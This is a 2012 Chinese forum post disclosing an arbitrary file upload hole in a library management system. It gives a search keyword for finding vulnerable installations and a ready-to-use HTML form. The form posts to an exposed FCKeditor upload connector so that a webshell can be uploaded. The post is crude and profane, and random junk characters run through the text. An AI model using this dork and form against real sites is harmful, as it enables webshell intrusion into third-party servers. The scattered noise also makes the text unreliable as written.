主题:图书馆系统任意文件上传漏洞
G) o8 H3 e4 `0 U' s 作者:冰锋刺客
' v4 P7 n. R$ x, I 厂商:点击书(dianjishu.com)0 j, ~: N! Y, ]9 g/ N
日期:2012-6-21
' d8 ^5 U9 l4 Q# ?
) M8 B7 o; w& F+ }7 Z% RI 概述
! f% F- a- q. t" u% A. J' } 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell2 r1 O! ^1 M+ j" q' o* h* @. J% m* l
II 简介
6 X# w, i i3 L 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
, Y, H m1 _- |' w6 Z' l* ^ 补充一个漏洞
' Z; {- O, m8 u5 q" D2 p <form id="frmUpload" enctype="multipart/form-data"" M7 x8 d* A- E! ~! S1 l
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>0 I0 m! T( ~1 h% d6 q
<input id="btnUpload" type="submit" value="操翻他">! A Y# g1 k9 |% b* f- t
</form>3 I/ W( Y* D8 F+ c2 j1 B8 @% |6 E" \
你们懂的& V2 x1 q; J3 T ]3 Z6 X
那傻逼提供还需要改包.1 ]# D# O7 c+ K: |0 ^5 F: A" ~0 {
自己看了下源代码发现fckeditor
% y# K/ {4 t/ G1 W2 Z* t7 n 直接秒杀2 D9 q+ W; o4 l1 F* ~
|
发表于 2012-9-10 21:20:59
收藏
支持
反对